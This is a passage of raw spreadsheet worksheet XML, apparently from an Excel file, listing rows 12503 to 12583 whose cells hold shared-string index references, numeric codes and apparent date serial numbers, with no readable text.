      </c>
      <c r="C12503" t="s">
        <v>1348</v>
      </c>
      <c r="D12503" t="s">
        <v>17923</v>
      </c>
      <c r="E12503" t="s">
        <v>17921</v>
      </c>
      <c r="F12503" t="s">
        <v>17921</v>
      </c>
      <c r="G12503" t="s">
        <v>6489</v>
      </c>
    </row>
    <row r="12504" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12504" t="s">
        <v>17924</v>
      </c>
      <c r="B12504">
        <v>22004</v>
      </c>
      <c r="C12504" t="s">
        <v>1345</v>
      </c>
      <c r="D12504" t="s">
        <v>17925</v>
      </c>
      <c r="E12504" t="s">
        <v>17921</v>
      </c>
      <c r="F12504" t="s">
        <v>17921</v>
      </c>
      <c r="G12504" t="s">
        <v>6489</v>
      </c>
    </row>
    <row r="12505" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12505" t="s">
        <v>17924</v>
      </c>
      <c r="B12505">
        <v>22004</v>
      </c>
      <c r="C12505" t="s">
        <v>1348</v>
      </c>
      <c r="D12505" t="s">
        <v>17925</v>
      </c>
      <c r="E12505" t="s">
        <v>17921</v>
      </c>
      <c r="F12505" t="s">
        <v>17921</v>
      </c>
      <c r="G12505" t="s">
        <v>6489</v>
      </c>
    </row>
    <row r="12506" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12506" t="s">
        <v>17924</v>
      </c>
      <c r="B12506">
        <v>22005</v>
      </c>
      <c r="C12506" t="s">
        <v>1345</v>
      </c>
      <c r="D12506" t="s">
        <v>17926</v>
      </c>
      <c r="E12506" t="s">
        <v>17921</v>
      </c>
      <c r="F12506" t="s">
        <v>17921</v>
      </c>
      <c r="G12506" t="s">
        <v>6489</v>
      </c>
    </row>
    <row r="12507" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12507" t="s">
        <v>17924</v>
      </c>
      <c r="B12507">
        <v>22005</v>
      </c>
      <c r="C12507" t="s">
        <v>1348</v>
      </c>
      <c r="D12507" t="s">
        <v>17926</v>
      </c>
      <c r="E12507" t="s">
        <v>17921</v>
      </c>
      <c r="F12507" t="s">
        <v>17921</v>
      </c>
      <c r="G12507" t="s">
        <v>6489</v>
      </c>
    </row>
    <row r="12508" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12508" t="s">
        <v>17927</v>
      </c>
      <c r="D12508" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12509" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12509" t="s">
        <v>17928</v>
      </c>
      <c r="B12509">
        <v>22125</v>
      </c>
      <c r="C12509" t="s">
        <v>1345</v>
      </c>
      <c r="D12509" t="s">
        <v>17929</v>
      </c>
      <c r="E12509" t="s">
        <v>15387</v>
      </c>
      <c r="F12509" t="s">
        <v>15387</v>
      </c>
      <c r="G12509">
        <v>39882</v>
      </c>
    </row>
    <row r="12510" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12510">
        <v>22125</v>
      </c>
      <c r="C12510" t="s">
        <v>1348</v>
      </c>
      <c r="D12510" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12511" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12511" t="s">
        <v>17930</v>
      </c>
      <c r="D12511" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12512" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12512" t="s">
        <v>17931</v>
      </c>
      <c r="B12512">
        <v>22128</v>
      </c>
      <c r="C12512" t="s">
        <v>1345</v>
      </c>
      <c r="D12512" t="s">
        <v>17932</v>
      </c>
      <c r="E12512" t="s">
        <v>15387</v>
      </c>
      <c r="F12512" t="s">
        <v>15387</v>
      </c>
      <c r="G12512">
        <v>39882</v>
      </c>
    </row>
    <row r="12513" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12513">
        <v>22128</v>
      </c>
      <c r="C12513" t="s">
        <v>1348</v>
      </c>
      <c r="D12513" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12514" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12514" t="s">
        <v>17933</v>
      </c>
      <c r="D12514" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12515" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12515" t="s">
        <v>17934</v>
      </c>
      <c r="B12515">
        <v>22222</v>
      </c>
      <c r="C12515" t="s">
        <v>1345</v>
      </c>
      <c r="D12515" t="s">
        <v>17935</v>
      </c>
      <c r="E12515" t="s">
        <v>17936</v>
      </c>
      <c r="F12515" t="s">
        <v>17937</v>
      </c>
      <c r="G12515">
        <v>41708</v>
      </c>
    </row>
    <row r="12516" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12516">
        <v>22222</v>
      </c>
      <c r="C12516" t="s">
        <v>1348</v>
      </c>
      <c r="D12516" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12517" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12517" t="s">
        <v>17938</v>
      </c>
      <c r="D12517" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12518" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12518" t="s">
        <v>17939</v>
      </c>
      <c r="B12518">
        <v>22273</v>
      </c>
      <c r="C12518" t="s">
        <v>1345</v>
      </c>
      <c r="D12518" t="s">
        <v>17939</v>
      </c>
      <c r="E12518" t="s">
        <v>5144</v>
      </c>
      <c r="F12518" t="s">
        <v>5144</v>
      </c>
    </row>
    <row r="12519" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12519" t="s">
        <v>17939</v>
      </c>
      <c r="B12519">
        <v>22273</v>
      </c>
      <c r="C12519" t="s">
        <v>1348</v>
      </c>
      <c r="D12519" t="s">
        <v>17939</v>
      </c>
      <c r="E12519" t="s">
        <v>5144</v>
      </c>
      <c r="F12519" t="s">
        <v>5144</v>
      </c>
    </row>
    <row r="12520" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12520" t="s">
        <v>17940</v>
      </c>
      <c r="D12520" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12521" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12521" t="s">
        <v>17941</v>
      </c>
      <c r="B12521">
        <v>22305</v>
      </c>
      <c r="C12521" t="s">
        <v>1345</v>
      </c>
      <c r="D12521" t="s">
        <v>17942</v>
      </c>
      <c r="E12521" t="s">
        <v>17943</v>
      </c>
      <c r="F12521" t="s">
        <v>17943</v>
      </c>
      <c r="G12521">
        <v>39310</v>
      </c>
    </row>
    <row r="12522" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12522" t="s">
        <v>17941</v>
      </c>
      <c r="B12522">
        <v>22305</v>
      </c>
      <c r="C12522" t="s">
        <v>1348</v>
      </c>
      <c r="D12522" t="s">
        <v>17942</v>
      </c>
      <c r="E12522" t="s">
        <v>17943</v>
      </c>
      <c r="F12522" t="s">
        <v>17943</v>
      </c>
      <c r="G12522">
        <v>39310</v>
      </c>
    </row>
    <row r="12523" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12523" t="s">
        <v>17944</v>
      </c>
      <c r="D12523" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12524" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12524" t="s">
        <v>17945</v>
      </c>
      <c r="B12524">
        <v>22335</v>
      </c>
      <c r="C12524" t="s">
        <v>1345</v>
      </c>
      <c r="D12524" t="s">
        <v>17946</v>
      </c>
      <c r="E12524" t="s">
        <v>17947</v>
      </c>
      <c r="F12524" t="s">
        <v>17948</v>
      </c>
      <c r="G12524">
        <v>42069</v>
      </c>
    </row>
    <row r="12525" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12525" t="s">
        <v>17949</v>
      </c>
      <c r="B12525">
        <v>22335</v>
      </c>
      <c r="C12525" t="s">
        <v>1348</v>
      </c>
      <c r="D12525" t="s">
        <v>17950</v>
      </c>
      <c r="E12525" t="s">
        <v>17947</v>
      </c>
      <c r="F12525" t="s">
        <v>17948</v>
      </c>
      <c r="G12525">
        <v>42069</v>
      </c>
    </row>
    <row r="12526" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12526" t="s">
        <v>17951</v>
      </c>
      <c r="D12526" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12527" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12527" t="s">
        <v>17952</v>
      </c>
      <c r="B12527">
        <v>22343</v>
      </c>
      <c r="C12527" t="s">
        <v>1345</v>
      </c>
      <c r="D12527" t="s">
        <v>17953</v>
      </c>
      <c r="E12527" t="s">
        <v>17943</v>
      </c>
      <c r="F12527" t="s">
        <v>17943</v>
      </c>
      <c r="G12527">
        <v>39310</v>
      </c>
    </row>
    <row r="12528" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12528" t="s">
        <v>17952</v>
      </c>
      <c r="B12528">
        <v>22343</v>
      </c>
      <c r="C12528" t="s">
        <v>1348</v>
      </c>
      <c r="D12528" t="s">
        <v>17953</v>
      </c>
      <c r="E12528" t="s">
        <v>17943</v>
      </c>
      <c r="F12528" t="s">
        <v>17943</v>
      </c>
      <c r="G12528">
        <v>39310</v>
      </c>
    </row>
    <row r="12529" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12529" t="s">
        <v>17954</v>
      </c>
      <c r="D12529" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12530" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12530" t="s">
        <v>17955</v>
      </c>
      <c r="B12530">
        <v>22347</v>
      </c>
      <c r="C12530" t="s">
        <v>1345</v>
      </c>
      <c r="D12530" t="s">
        <v>17956</v>
      </c>
      <c r="E12530" t="s">
        <v>17957</v>
      </c>
      <c r="F12530" t="s">
        <v>17957</v>
      </c>
      <c r="G12530" t="s">
        <v>2761</v>
      </c>
    </row>
    <row r="12531" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12531" t="s">
        <v>17955</v>
      </c>
      <c r="B12531">
        <v>22347</v>
      </c>
      <c r="C12531" t="s">
        <v>1348</v>
      </c>
      <c r="D12531" t="s">
        <v>17956</v>
      </c>
      <c r="E12531" t="s">
        <v>17957</v>
      </c>
      <c r="F12531" t="s">
        <v>17957</v>
      </c>
      <c r="G12531" t="s">
        <v>2761</v>
      </c>
    </row>
    <row r="12532" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12532" t="s">
        <v>17958</v>
      </c>
      <c r="D12532" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12533" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12533" t="s">
        <v>17959</v>
      </c>
      <c r="B12533">
        <v>22350</v>
      </c>
      <c r="C12533" t="s">
        <v>1345</v>
      </c>
      <c r="D12533" t="s">
        <v>17960</v>
      </c>
      <c r="E12533" t="s">
        <v>17957</v>
      </c>
      <c r="F12533" t="s">
        <v>17957</v>
      </c>
      <c r="G12533" t="s">
        <v>2761</v>
      </c>
    </row>
    <row r="12534" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12534" t="s">
        <v>17959</v>
      </c>
      <c r="B12534">
        <v>22350</v>
      </c>
      <c r="C12534" t="s">
        <v>1348</v>
      </c>
      <c r="D12534" t="s">
        <v>17960</v>
      </c>
      <c r="E12534" t="s">
        <v>17957</v>
      </c>
      <c r="F12534" t="s">
        <v>17957</v>
      </c>
      <c r="G12534" t="s">
        <v>2761</v>
      </c>
    </row>
    <row r="12535" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12535" t="s">
        <v>17961</v>
      </c>
      <c r="B12535">
        <v>22351</v>
      </c>
      <c r="C12535" t="s">
        <v>1345</v>
      </c>
      <c r="D12535" t="s">
        <v>17962</v>
      </c>
      <c r="E12535" t="s">
        <v>17963</v>
      </c>
      <c r="F12535" t="s">
        <v>17964</v>
      </c>
      <c r="G12535">
        <v>41450</v>
      </c>
    </row>
    <row r="12536" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12536">
        <v>22351</v>
      </c>
      <c r="C12536" t="s">
        <v>1348</v>
      </c>
      <c r="D12536" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12537" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12537" t="s">
        <v>17965</v>
      </c>
      <c r="D12537" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12538" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12538" t="s">
        <v>17966</v>
      </c>
      <c r="B12538">
        <v>22537</v>
      </c>
      <c r="C12538" t="s">
        <v>1345</v>
      </c>
      <c r="D12538" t="s">
        <v>17967</v>
      </c>
      <c r="E12538" t="s">
        <v>17968</v>
      </c>
      <c r="F12538" t="s">
        <v>17969</v>
      </c>
      <c r="G12538">
        <v>40767</v>
      </c>
    </row>
    <row r="12539" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12539">
        <v>22537</v>
      </c>
      <c r="C12539" t="s">
        <v>1348</v>
      </c>
      <c r="D12539" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12540" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12540" t="s">
        <v>17970</v>
      </c>
      <c r="D12540" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12541" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12541" t="s">
        <v>17971</v>
      </c>
      <c r="B12541">
        <v>22555</v>
      </c>
      <c r="C12541" t="s">
        <v>1345</v>
      </c>
      <c r="D12541" t="s">
        <v>17972</v>
      </c>
      <c r="E12541" t="s">
        <v>5177</v>
      </c>
      <c r="F12541" t="s">
        <v>5177</v>
      </c>
    </row>
    <row r="12542" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12542" t="s">
        <v>17973</v>
      </c>
      <c r="B12542">
        <v>22555</v>
      </c>
      <c r="C12542" t="s">
        <v>1348</v>
      </c>
      <c r="D12542" t="s">
        <v>17974</v>
      </c>
      <c r="E12542" t="s">
        <v>5177</v>
      </c>
      <c r="F12542" t="s">
        <v>5177</v>
      </c>
    </row>
    <row r="12543" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12543" t="s">
        <v>17975</v>
      </c>
      <c r="D12543" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12544" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12544" t="s">
        <v>17976</v>
      </c>
      <c r="B12544">
        <v>22763</v>
      </c>
      <c r="C12544" t="s">
        <v>1345</v>
      </c>
      <c r="D12544" t="s">
        <v>17977</v>
      </c>
      <c r="E12544" t="s">
        <v>17978</v>
      </c>
      <c r="F12544" t="s">
        <v>17978</v>
      </c>
      <c r="G12544" t="s">
        <v>11298</v>
      </c>
    </row>
    <row r="12545" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12545" t="s">
        <v>17976</v>
      </c>
      <c r="B12545">
        <v>22763</v>
      </c>
      <c r="C12545" t="s">
        <v>1348</v>
      </c>
      <c r="D12545" t="s">
        <v>17977</v>
      </c>
      <c r="E12545" t="s">
        <v>17978</v>
      </c>
      <c r="F12545" t="s">
        <v>17978</v>
      </c>
      <c r="G12545" t="s">
        <v>11298</v>
      </c>
    </row>
    <row r="12546" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12546" t="s">
        <v>17979</v>
      </c>
      <c r="D12546" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12547" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12547" t="s">
        <v>17980</v>
      </c>
      <c r="B12547">
        <v>22800</v>
      </c>
      <c r="C12547" t="s">
        <v>1345</v>
      </c>
      <c r="D12547" t="s">
        <v>17981</v>
      </c>
      <c r="E12547" t="s">
        <v>8362</v>
      </c>
      <c r="F12547" t="s">
        <v>8362</v>
      </c>
    </row>
    <row r="12548" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12548" t="s">
        <v>17980</v>
      </c>
      <c r="B12548">
        <v>22800</v>
      </c>
      <c r="C12548" t="s">
        <v>1348</v>
      </c>
      <c r="D12548" t="s">
        <v>17981</v>
      </c>
      <c r="E12548" t="s">
        <v>8362</v>
      </c>
      <c r="F12548" t="s">
        <v>8362</v>
      </c>
    </row>
    <row r="12549" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12549" t="s">
        <v>17982</v>
      </c>
      <c r="D12549" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12550" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12550" t="s">
        <v>17983</v>
      </c>
      <c r="B12550">
        <v>22951</v>
      </c>
      <c r="C12550" t="s">
        <v>1345</v>
      </c>
      <c r="D12550" t="s">
        <v>17984</v>
      </c>
      <c r="E12550" t="s">
        <v>8362</v>
      </c>
      <c r="F12550" t="s">
        <v>8362</v>
      </c>
    </row>
    <row r="12551" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12551" t="s">
        <v>17983</v>
      </c>
      <c r="B12551">
        <v>22951</v>
      </c>
      <c r="C12551" t="s">
        <v>1348</v>
      </c>
      <c r="D12551" t="s">
        <v>17984</v>
      </c>
      <c r="E12551" t="s">
        <v>8362</v>
      </c>
      <c r="F12551" t="s">
        <v>8362</v>
      </c>
    </row>
    <row r="12552" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12552" t="s">
        <v>17985</v>
      </c>
      <c r="D12552" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12553" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12553" t="s">
        <v>17986</v>
      </c>
      <c r="B12553">
        <v>23000</v>
      </c>
      <c r="C12553" t="s">
        <v>1345</v>
      </c>
      <c r="D12553" t="s">
        <v>17987</v>
      </c>
      <c r="E12553" t="s">
        <v>17988</v>
      </c>
      <c r="F12553" t="s">
        <v>17988</v>
      </c>
      <c r="G12553" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12554" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12554" t="s">
        <v>17986</v>
      </c>
      <c r="B12554">
        <v>23000</v>
      </c>
      <c r="C12554" t="s">
        <v>1348</v>
      </c>
      <c r="D12554" t="s">
        <v>17987</v>
      </c>
      <c r="E12554" t="s">
        <v>17988</v>
      </c>
      <c r="F12554" t="s">
        <v>17988</v>
      </c>
      <c r="G12554" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12555" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12555" t="s">
        <v>17989</v>
      </c>
      <c r="B12555">
        <v>23001</v>
      </c>
      <c r="C12555" t="s">
        <v>1345</v>
      </c>
      <c r="D12555" t="s">
        <v>17990</v>
      </c>
      <c r="E12555" t="s">
        <v>17988</v>
      </c>
      <c r="F12555" t="s">
        <v>17988</v>
      </c>
      <c r="G12555" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12556" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12556" t="s">
        <v>17989</v>
      </c>
      <c r="B12556">
        <v>23001</v>
      </c>
      <c r="C12556" t="s">
        <v>1348</v>
      </c>
      <c r="D12556" t="s">
        <v>17990</v>
      </c>
      <c r="E12556" t="s">
        <v>17988</v>
      </c>
      <c r="F12556" t="s">
        <v>17988</v>
      </c>
      <c r="G12556" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12557" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12557" t="s">
        <v>17991</v>
      </c>
      <c r="B12557">
        <v>23002</v>
      </c>
      <c r="C12557" t="s">
        <v>1345</v>
      </c>
      <c r="D12557" t="s">
        <v>17992</v>
      </c>
      <c r="E12557" t="s">
        <v>17988</v>
      </c>
      <c r="F12557" t="s">
        <v>17988</v>
      </c>
      <c r="G12557" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12558" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12558" t="s">
        <v>17991</v>
      </c>
      <c r="B12558">
        <v>23002</v>
      </c>
      <c r="C12558" t="s">
        <v>1348</v>
      </c>
      <c r="D12558" t="s">
        <v>17992</v>
      </c>
      <c r="E12558" t="s">
        <v>17988</v>
      </c>
      <c r="F12558" t="s">
        <v>17988</v>
      </c>
      <c r="G12558" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12559" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12559" t="s">
        <v>17993</v>
      </c>
      <c r="B12559">
        <v>23003</v>
      </c>
      <c r="C12559" t="s">
        <v>1345</v>
      </c>
      <c r="D12559" t="s">
        <v>17994</v>
      </c>
      <c r="E12559" t="s">
        <v>17988</v>
      </c>
      <c r="F12559" t="s">
        <v>17988</v>
      </c>
      <c r="G12559" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12560" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12560" t="s">
        <v>17993</v>
      </c>
      <c r="B12560">
        <v>23003</v>
      </c>
      <c r="C12560" t="s">
        <v>1348</v>
      </c>
      <c r="D12560" t="s">
        <v>17994</v>
      </c>
      <c r="E12560" t="s">
        <v>17988</v>
      </c>
      <c r="F12560" t="s">
        <v>17988</v>
      </c>
      <c r="G12560" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12561" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12561" t="s">
        <v>17995</v>
      </c>
      <c r="B12561">
        <v>23004</v>
      </c>
      <c r="C12561" t="s">
        <v>1345</v>
      </c>
      <c r="D12561" t="s">
        <v>17996</v>
      </c>
      <c r="E12561" t="s">
        <v>17988</v>
      </c>
      <c r="F12561" t="s">
        <v>17988</v>
      </c>
      <c r="G12561" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12562" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12562" t="s">
        <v>17995</v>
      </c>
      <c r="B12562">
        <v>23004</v>
      </c>
      <c r="C12562" t="s">
        <v>1348</v>
      </c>
      <c r="D12562" t="s">
        <v>17996</v>
      </c>
      <c r="E12562" t="s">
        <v>17988</v>
      </c>
      <c r="F12562" t="s">
        <v>17988</v>
      </c>
      <c r="G12562" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12563" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12563" t="s">
        <v>17997</v>
      </c>
      <c r="B12563">
        <v>23005</v>
      </c>
      <c r="C12563" t="s">
        <v>1345</v>
      </c>
      <c r="D12563" t="s">
        <v>17998</v>
      </c>
      <c r="E12563" t="s">
        <v>17988</v>
      </c>
      <c r="F12563" t="s">
        <v>17988</v>
      </c>
      <c r="G12563" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12564" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12564" t="s">
        <v>17997</v>
      </c>
      <c r="B12564">
        <v>23005</v>
      </c>
      <c r="C12564" t="s">
        <v>1348</v>
      </c>
      <c r="D12564" t="s">
        <v>17998</v>
      </c>
      <c r="E12564" t="s">
        <v>17988</v>
      </c>
      <c r="F12564" t="s">
        <v>17988</v>
      </c>
      <c r="G12564" t="s">
        <v>10650</v>
      </c>
    </row>
    <row r="12565" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12565" t="s">
        <v>17999</v>
      </c>
      <c r="D12565" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12566" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12566" t="s">
        <v>18000</v>
      </c>
      <c r="B12566">
        <v>23053</v>
      </c>
      <c r="C12566" t="s">
        <v>1345</v>
      </c>
      <c r="D12566" t="s">
        <v>18001</v>
      </c>
      <c r="E12566" t="s">
        <v>18002</v>
      </c>
      <c r="F12566" t="s">
        <v>18003</v>
      </c>
      <c r="G12566">
        <v>40946</v>
      </c>
    </row>
    <row r="12567" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12567">
        <v>23053</v>
      </c>
      <c r="C12567" t="s">
        <v>1348</v>
      </c>
      <c r="D12567" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12568" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12568" t="s">
        <v>18004</v>
      </c>
      <c r="D12568" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12569" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12569">
        <v>23272</v>
      </c>
      <c r="C12569" t="s">
        <v>1345</v>
      </c>
      <c r="D12569" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12570" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12570" t="s">
        <v>18005</v>
      </c>
      <c r="B12570">
        <v>23272</v>
      </c>
      <c r="C12570" t="s">
        <v>1348</v>
      </c>
      <c r="D12570" t="s">
        <v>18006</v>
      </c>
      <c r="E12570" t="s">
        <v>16164</v>
      </c>
      <c r="F12570" t="s">
        <v>16164</v>
      </c>
      <c r="G12570">
        <v>40051</v>
      </c>
    </row>
    <row r="12571" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12571" t="s">
        <v>18007</v>
      </c>
      <c r="D12571" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12572" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12572" t="s">
        <v>18008</v>
      </c>
      <c r="B12572">
        <v>23294</v>
      </c>
      <c r="C12572" t="s">
        <v>1345</v>
      </c>
      <c r="D12572" t="s">
        <v>18009</v>
      </c>
      <c r="E12572" t="s">
        <v>18010</v>
      </c>
      <c r="F12572" t="s">
        <v>18011</v>
      </c>
      <c r="G12572">
        <v>42461</v>
      </c>
    </row>
    <row r="12573" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12573" t="s">
        <v>18012</v>
      </c>
      <c r="B12573">
        <v>23294</v>
      </c>
      <c r="C12573" t="s">
        <v>1348</v>
      </c>
      <c r="D12573" t="s">
        <v>18013</v>
      </c>
      <c r="E12573" t="s">
        <v>18010</v>
      </c>
      <c r="F12573" t="s">
        <v>18011</v>
      </c>
      <c r="G12573">
        <v>42461</v>
      </c>
    </row>
    <row r="12574" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12574" t="s">
        <v>18014</v>
      </c>
      <c r="D12574" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12575" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12575" t="s">
        <v>18015</v>
      </c>
      <c r="B12575">
        <v>23333</v>
      </c>
      <c r="C12575" t="s">
        <v>1345</v>
      </c>
      <c r="D12575" t="s">
        <v>18016</v>
      </c>
      <c r="E12575" t="s">
        <v>18017</v>
      </c>
      <c r="F12575" t="s">
        <v>18017</v>
      </c>
      <c r="G12575">
        <v>39392</v>
      </c>
    </row>
    <row r="12576" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12576" t="s">
        <v>18015</v>
      </c>
      <c r="B12576">
        <v>23333</v>
      </c>
      <c r="C12576" t="s">
        <v>1348</v>
      </c>
      <c r="D12576" t="s">
        <v>18016</v>
      </c>
      <c r="E12576" t="s">
        <v>18017</v>
      </c>
      <c r="F12576" t="s">
        <v>18017</v>
      </c>
      <c r="G12576">
        <v>39392</v>
      </c>
    </row>
    <row r="12577" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12577" t="s">
        <v>18018</v>
      </c>
      <c r="D12577" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12578" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12578" t="s">
        <v>18019</v>
      </c>
      <c r="B12578">
        <v>23400</v>
      </c>
      <c r="C12578" t="s">
        <v>1345</v>
      </c>
      <c r="D12578" t="s">
        <v>18020</v>
      </c>
      <c r="E12578" t="s">
        <v>18021</v>
      </c>
      <c r="F12578" t="s">
        <v>18021</v>
      </c>
      <c r="G12578" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12579" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12579" t="s">
        <v>18019</v>
      </c>
      <c r="B12579">
        <v>23400</v>
      </c>
      <c r="C12579" t="s">
        <v>1348</v>
      </c>
      <c r="D12579" t="s">
        <v>18020</v>
      </c>
      <c r="E12579" t="s">
        <v>18021</v>
      </c>
      <c r="F12579" t="s">
        <v>18021</v>
      </c>
      <c r="G12579" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12580" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12580" t="s">
        <v>18022</v>
      </c>
      <c r="B12580">
        <v>23401</v>
      </c>
      <c r="C12580" t="s">
        <v>1345</v>
      </c>
      <c r="D12580" t="s">
        <v>18023</v>
      </c>
      <c r="E12580" t="s">
        <v>18021</v>
      </c>
      <c r="F12580" t="s">
        <v>18021</v>
      </c>
      <c r="G12580" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12581" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12581" t="s">
        <v>18022</v>
      </c>
      <c r="B12581">
        <v>23401</v>
      </c>
      <c r="C12581" t="s">
        <v>1348</v>
      </c>
      <c r="D12581" t="s">
        <v>18023</v>
      </c>
      <c r="E12581" t="s">
        <v>18021</v>
      </c>
      <c r="F12581" t="s">
        <v>18021</v>
      </c>
      <c r="G12581" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12582" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12582" t="s">
        <v>18024</v>
      </c>
      <c r="B12582">
        <v>23402</v>
      </c>
      <c r="C12582" t="s">
        <v>1345</v>
      </c>
      <c r="D12582" t="s">
        <v>18025</v>
      </c>
      <c r="E12582" t="s">
        <v>18021</v>
      </c>
      <c r="F12582" t="s">
        <v>18021</v>
      </c>
      <c r="G12582" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12583" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12583" t="s">
        <v>18024</v>
      </c>
      <c r="B12583">
        <v>23402</v>
      </c>
      <c r="C12583" t="s">
        <v>1348</v>
      </c>
      <c r="D12583" t="s">
        <v>18025</v>
      </c>
      <c r="E12583" t="s">
        <v>18021</v>
      </c>
      <c r="F12583" t="s">
        <v>18021</v>
      </c>
